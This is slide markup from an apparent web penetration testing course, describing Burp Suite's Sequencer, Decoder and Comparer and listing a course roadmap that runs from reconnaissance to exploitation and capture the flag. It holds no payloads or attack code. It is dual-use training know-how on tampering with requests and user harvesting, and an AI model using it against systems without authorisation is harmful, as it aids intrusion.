              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If so, it stops after 10 to prevent infinite loops </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can also use this to manually modify the request before submitting it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D7FA86C-6C74-4E10-AA2A-7B9BBC4EDEE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4315357" y="1741202"/>
            <a:ext cx="4692165" cy="3705222"/>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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Sequencer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="137160" y="1454468"/>
            <a:ext cx="4724400" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The sequencer is used to analyze the randomness of session tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp sequencer performs a large number of tests to determine the randomness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Way beyond just graphing the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It runs the various tests and automatically analyzes the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>FIPS 140-2 tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Compressing the values using ZLIB since predictable session compress better</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Correlation tests that also determine predictability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It includes excellent descriptions for the non-mathematicians</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C69DC407-5627-4853-AE15-A7B046B27945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4628554" y="1209671"/>
            <a:ext cx="4455543" cy="3678704"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Decoder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="76200" y="1493520"/>
            <a:ext cx="4572000" cy="4876800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The decoder included in Burp is an excellent way to determine the specific data passed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is able to automatically determine which encoding scheme is used in a cookie or </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It understands URL, HTML, BASE64, ASCII, octal, hex, binary and even gzip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Let's say an application responds with a cookie value that appears to be garbage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using the decoder we may find that it is simply our user name BASE64 encoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The decoder name is misleading because it will also encode data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We use this to modify the data and then submit it using the encoding the application expected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Depending on our version of Java, it also supports hashing data with SHA1 and MD5	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73735" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="4648200" y="1524000"/>
            <a:ext cx="4191000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D44FE0-D211-494A-A8A9-1221F437759B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4612032" y="1668801"/>
            <a:ext cx="4399888" cy="3482011"/>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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Comparer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1371600"/>
            <a:ext cx="4267200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The comparer allows us to look at two different items and see the differences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It can see differences at the byte level or in the words</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It uses whitespace to determine words</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We commonly use this to see the results from using Intruder against a page or in user harvesting flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The comparer can use any request in the Burp session or we can load them from files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{908AABFE-1F6F-456D-AD20-1CE3088EE826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="1296458"/>
            <a:ext cx="4651186" cy="3618923"/>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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
